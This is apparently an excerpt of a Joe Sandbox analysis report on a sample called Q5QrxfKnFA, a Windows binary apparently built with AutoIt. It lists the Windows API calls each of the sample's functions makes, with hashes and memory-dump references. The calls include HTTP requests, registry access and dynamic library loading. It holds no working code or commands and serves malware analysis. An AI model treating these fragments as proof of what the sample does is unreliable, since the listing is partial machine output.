                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                        • API String ID: 4237274167-1221869570
                                                        • Opcode ID: 1244aeb95c6a8d3e9e74118b02fb93e23548d72559198aa238503abb188d8914
                                                        • Instruction ID: 6eb84028c5ff028bc848a9c39d60ca1fd1d73924676f1c0d67cc92e38e569ca5
                                                        • Opcode Fuzzy Hash: 1244aeb95c6a8d3e9e74118b02fb93e23548d72559198aa238503abb188d8914
                                                        • Instruction Fuzzy Hash: F9918E716043019FC711DF24C48599BBBE8EF89718F14896EF98ACB761DB31E905CB51
                                                        APIs
                                                          • Part of subcall function 0035FC86: _wcscpy.LIBCMT ref: 0035FCA9
                                                        • _memset.LIBCMT ref: 003A2B87
                                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 003A2BB6
                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 003A2C69
                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 003A2C97
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                        • String ID: 0
                                                        • API String ID: 4152858687-4108050209
                                                        • Opcode ID: 796a6038ee58e4798529a6f19c2b847d50c27bb2805b60a5f4a2f85b4ce4e42c
                                                        • Instruction ID: 1f12dd542b580d265f00246200647d187b8ae9bcf1c4959ac2f0f65da508e850
                                                        • Opcode Fuzzy Hash: 796a6038ee58e4798529a6f19c2b847d50c27bb2805b60a5f4a2f85b4ce4e42c
                                                        • Instruction Fuzzy Hash: 7051AC716083009FD72A9F2CC845A6FB7E8EF8A320F054A2DF895D7190DB74DD048B66
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: _memmove$_free
                                                        • String ID: 3c5$_5
                                                        • API String ID: 2620147621-2150917133
                                                        • Opcode ID: a88df76986fd155adea2fce6647661ee342c296748e1730f69d79c30b5b483b4
                                                        • Instruction ID: 56dc598cdc5da04ad3bf41a39b25cc4127b1666ec98dc8f7ba22f480954d4200
                                                        • Opcode Fuzzy Hash: a88df76986fd155adea2fce6647661ee342c296748e1730f69d79c30b5b483b4
                                                        • Instruction Fuzzy Hash: 07517CB16087418FDB26CF29C481B6FBBE5BF85350F05892DE98987360D731E905CB82
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: _memset$_memmove
                                                        • String ID: 3c5$ERCP
                                                        • API String ID: 2532777613-3339050422
                                                        • Opcode ID: e7f46a3af0dc2dc31307e62e91cd710004bb4f924dda2b3e6f6630a104780c48
                                                        • Instruction ID: 2a14e85183f511e7b8678312a8d59c28694fe9097911bbd7a3acfe8be7bffb19
                                                        • Opcode Fuzzy Hash: e7f46a3af0dc2dc31307e62e91cd710004bb4f924dda2b3e6f6630a104780c48
                                                        • Instruction Fuzzy Hash: 7A51A471900709DFDB26CF55C982BAAB7F8EF44315F61896EE94ACB260E770E944CB40
                                                        APIs
                                                        • _memset.LIBCMT ref: 003A27C0
                                                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 003A27DC
                                                        • DeleteMenu.USER32(?,00000007,00000000), ref: 003A2822
                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00405890,00000000), ref: 003A286B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Menu$Delete$InfoItem_memset
                                                        • String ID: 0
                                                        • API String ID: 1173514356-4108050209
                                                        • Opcode ID: f160113c850f5928b07de30967e08ad1dd7551c73170c52fc3ce47035c8b11f6
                                                        • Instruction ID: 7b22dde29d72cf66eed6d8e46641c0f85c262d2adbffedcde6e8cf6f783dbc96
                                                        • Opcode Fuzzy Hash: f160113c850f5928b07de30967e08ad1dd7551c73170c52fc3ce47035c8b11f6
                                                        • Instruction Fuzzy Hash: A241AE702043019FDB22DF29C844F1BBBE8EF86314F05492DF9A59B291DB34E905CB52
                                                        APIs
                                                        • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 003BD7C5
                                                          • Part of subcall function 0034784B: _memmove.LIBCMT ref: 00347899
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: BuffCharLower_memmove
                                                        • String ID: cdecl$none$stdcall$winapi
                                                        • API String ID: 3425801089-567219261
                                                        • Opcode ID: 377f57c627c5103079115c3b5d075b35cd524d6ec01a5d107930107dc968dfba
                                                        • Instruction ID: cd7e0d907dbb8505f1620c81506c4708d8e696ecd626028f6e33610189a6cbfe
                                                        • Opcode Fuzzy Hash: 377f57c627c5103079115c3b5d075b35cd524d6ec01a5d107930107dc968dfba
                                                        • Instruction Fuzzy Hash: 7F31B071904619AFCF06EF54CC519FEB3B5FF04324B10862AE965DBAD1EB31A905CB80
                                                        APIs
                                                          • Part of subcall function 00347DE1: _memmove.LIBCMT ref: 00347E22
                                                          • Part of subcall function 0039AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0039AABC
                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00398F14
                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00398F27
                                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 00398F57
                                                          • Part of subcall function 00347BCC: _memmove.LIBCMT ref: 00347C06
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$_memmove$ClassName
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 365058703-1403004172
                                                        • Opcode ID: 4db69b255abbcb0917fb4fa74591cac2f97264d0498e52d0aa9de59813d0cfa8
                                                        • Instruction ID: 2071cddba539fac6d94faab47d53f16dedd2bc0111a07d1b75118ca5f0b37c58
                                                        • Opcode Fuzzy Hash: 4db69b255abbcb0917fb4fa74591cac2f97264d0498e52d0aa9de59813d0cfa8
                                                        • Instruction Fuzzy Hash: A821F272A04104BFDF16ABA0DC46DFFB7A9DF46360F004519F4229B2E1DB3958099610
                                                        APIs
                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 003B184C
                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003B1872
                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 003B18A2
                                                        • InternetCloseHandle.WININET(00000000), ref: 003B18E9
                                                          • Part of subcall function 003B2483: GetLastError.KERNEL32(?,?,003B1817,00000000,00000000,00000001), ref: 003B2498
                                                          • Part of subcall function 003B2483: SetEvent.KERNEL32(?,?,003B1817,00000000,00000000,00000001), ref: 003B24AD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                        • String ID:
                                                        • API String ID: 3113390036-3916222277
                                                        • Opcode ID: 5cdf462af932d0ed1c201d721a592effc2c10669b3772e0fb176024175f35877
                                                        • Instruction ID: 8bc697013161d6097a4e1d6d95a4cd22beb52239d4ec898395236e18fbb500e3
                                                        • Opcode Fuzzy Hash: 5cdf462af932d0ed1c201d721a592effc2c10669b3772e0fb176024175f35877
                                                        • Instruction Fuzzy Hash: 4E2180B2500208BFEB129F65DC95EFB77EDFB48748F10412AFA05E6940DB219E0557A1
                                                        APIs
                                                          • Part of subcall function 00341D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00341D73
                                                          • Part of subcall function 00341D35: GetStockObject.GDI32(00000011), ref: 00341D87
                                                          • Part of subcall function 00341D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00341D91
                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 003C6461
                                                        • LoadLibraryW.KERNEL32(?), ref: 003C6468
                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 003C647D
                                                        • DestroyWindow.USER32(?), ref: 003C6485
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                        • String ID: SysAnimate32
                                                        • API String ID: 4146253029-1011021900
                                                        • Opcode ID: 31cecca665f09aa99ee9c4e8f7f493d10d86e98a1dbf8744027d24f42821afd8
                                                        • Instruction ID: 9574cffaf37bb988e6d7db5d0b4a0654b50d64bf065f4cb954715e9138d74d33
                                                        • Opcode Fuzzy Hash: 31cecca665f09aa99ee9c4e8f7f493d10d86e98a1dbf8744027d24f42821afd8
                                                        • Instruction Fuzzy Hash: 48217972200205AFEF168F65DC82FBA37ADEF59328F114629FA10D61A0D631AC51A760
                                                        APIs
                                                        • GetStdHandle.KERNEL32(0000000C), ref: 003A6DBC
                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003A6DEF
                                                        • GetStdHandle.KERNEL32(0000000C), ref: 003A6E01
                                                        • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 003A6E3B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: CreateHandle$FilePipe
                                                        • String ID: nul
                                                        • API String ID: 4209266947-2873401336
                                                        • Opcode ID: fcce2bb171d9fff67ed5f250f0286547538daaf14a46b000d23cf1ae71c92ef3
                                                        • Instruction ID: b316f55a41ea991063d5a38d040f5c3aaa33687f0e1cc9128331e005232363d8
                                                        • Opcode Fuzzy Hash: fcce2bb171d9fff67ed5f250f0286547538daaf14a46b000d23cf1ae71c92ef3
                                                        • Instruction Fuzzy Hash: B5219274600209EFDB229F39DC06E9AB7F8EF46760F244A19FDA1D72D0D77099508B50
                                                        APIs
                                                        • GetStdHandle.KERNEL32(000000F6), ref: 003A6E89
                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003A6EBB
                                                        • GetStdHandle.KERNEL32(000000F6), ref: 003A6ECC
                                                        • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 003A6F06
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: CreateHandle$FilePipe
                                                        • String ID: nul
                                                        • API String ID: 4209266947-2873401336
                                                        • Opcode ID: 5b7b46a912329500d73b10850eb926dd3eab1f6dc9c9aa662d03a55be030e5dd
                                                        • Instruction ID: 9c3f8da36a0073aaa088bb4a1a4217de8ea173968173c1476acc0143205b5223
                                                        • Opcode Fuzzy Hash: 5b7b46a912329500d73b10850eb926dd3eab1f6dc9c9aa662d03a55be030e5dd
                                                        • Instruction Fuzzy Hash: A821A479500305AFDB229F69DD06E9AB7A8EF46730F280A19FDE0D72D0D770A850C750
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 003AAC54
                                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 003AACA8
                                                        • __swprintf.LIBCMT ref: 003AACC1
                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000,003CF910), ref: 003AACFF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$InformationVolume__swprintf
                                                        • String ID: %lu
                                                        • API String ID: 3164766367-685833217
                                                        • Opcode ID: d1eec44d99acd6ed73c4e4531df720adf28f39a8952c1a7304985605ce9fa7a1
                                                        • Instruction ID: 162aa7e96f0debec0eabcb79561e3378122a9896b02fd65a61414e3febb56250
                                                        • Opcode Fuzzy Hash: d1eec44d99acd6ed73c4e4531df720adf28f39a8952c1a7304985605ce9fa7a1
                                                        • Instruction Fuzzy Hash: 25214135A00109AFCB11DF65C945EEFBBB8EF49714B004469F909DF252DB31EA41DB61
                                                        APIs
                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0039FCED,?,003A0D40,?,00008000), ref: 003A115F
                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0039FCED,?,003A0D40,?,00008000), ref: 003A1184
                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0039FCED,?,003A0D40,?,00008000), ref: 003A118E
                                                        • Sleep.KERNEL32(?,?,?,?,?,?,?,0039FCED,?,003A0D40,?,00008000), ref: 003A11C1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: CounterPerformanceQuerySleep
                                                        • String ID: @:
                                                        • API String ID: 2875609808-4235850541
                                                        • Opcode ID: 5d40fa137e91f4376e7ff9590863a7f710b54b9a7ed321da96f466982c3eed2f
                                                        • Instruction ID: bdecc42890626f5b9540278b55fdb693c303f80ff36d5e0591980b51e0cd81eb
                                                        • Opcode Fuzzy Hash: 5d40fa137e91f4376e7ff9590863a7f710b54b9a7ed321da96f466982c3eed2f
                                                        • Instruction Fuzzy Hash: 1B113C35D0051DDBCF029FA5D849AEEBBBCFF0A711F054056EA81B6240CB70A550CB95
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?), ref: 003A1B19
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpper
                                                        • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                        • API String ID: 3964851224-769500911
                                                        • Opcode ID: 74efa7a6ca4d179e7e712f6d85371edfb40118cb34b8a05bc6636aead18ddd8c
                                                        • Instruction ID: 487affc8532d210c6f7d49586e62e1d258df26b9f12334ee6fa775262d0a9d6b
                                                        • Opcode Fuzzy Hash: 74efa7a6ca4d179e7e712f6d85371edfb40118cb34b8a05bc6636aead18ddd8c
                                                        • Instruction Fuzzy Hash: C31161759101088FCF06EF94D8528FEB7B5FF26304F108465D864AB6A2EB326D06DB50
                                                        APIs
                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 003BEC07
                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 003BEC37
                                                        • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 003BED6A
                                                        • CloseHandle.KERNEL32(?), ref: 003BEDEB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                        • String ID:
                                                        • API String ID: 2364364464-0
                                                        • Opcode ID: 42a21c7079fb16ad2d0dc5745126f589c56840367f2a27f2678289a7f8175731
                                                        • Instruction ID: 254f07207cb2eb17df0dc32f1f8ac16fd5404933470b178df083d2578e37327b
                                                        • Opcode Fuzzy Hash: 42a21c7079fb16ad2d0dc5745126f589c56840367f2a27f2678289a7f8175731
                                                        • Instruction Fuzzy Hash: A48161716043009FD762EF28C886F6AB7E5AF48714F04881DF999DF692D7B1AC40CB91
                                                        APIs
                                                          • Part of subcall function 00347DE1: _memmove.LIBCMT ref: 00347E22
                                                          • Part of subcall function 003C0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003BFDAD,?,?), ref: 003C0E31
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003C00FD
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003C013C
                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 003C0183
                                                        • RegCloseKey.ADVAPI32(?,?), ref: 003C01AF
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 003C01BC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                        • String ID:
                                                        • API String ID: 3440857362-0
                                                        • Opcode ID: 6748ebc177dcac7acc0384a85ec566d7e2c2f21dd7b6c375da1cc424aa669f2b
                                                        • Instruction ID: 26d0f9b68890bea5070d157b8fdd494f7506204a45866bce7e6387865ee0bec4
                                                        • Opcode Fuzzy Hash: 6748ebc177dcac7acc0384a85ec566d7e2c2f21dd7b6c375da1cc424aa669f2b
                                                        • Instruction Fuzzy Hash: 0F512871208244AFD716EF58C881F6AB7E9AF84714F44892DF5958B2A2DB31ED04CB52
                                                        APIs
                                                          • Part of subcall function 00349837: __itow.LIBCMT ref: 00349862
                                                          • Part of subcall function 00349837: __swprintf.LIBCMT ref: 003498AC
                                                        • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 003BD927
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 003BD9AA
                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 003BD9C6
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 003BDA07
                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 003BDA21
                                                          • Part of subcall function 00345A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,003A7896,?,?,00000000), ref: 00345A2C
                                                          • Part of subcall function 00345A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,003A7896,?,?,00000000,?,?), ref: 00345A50
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
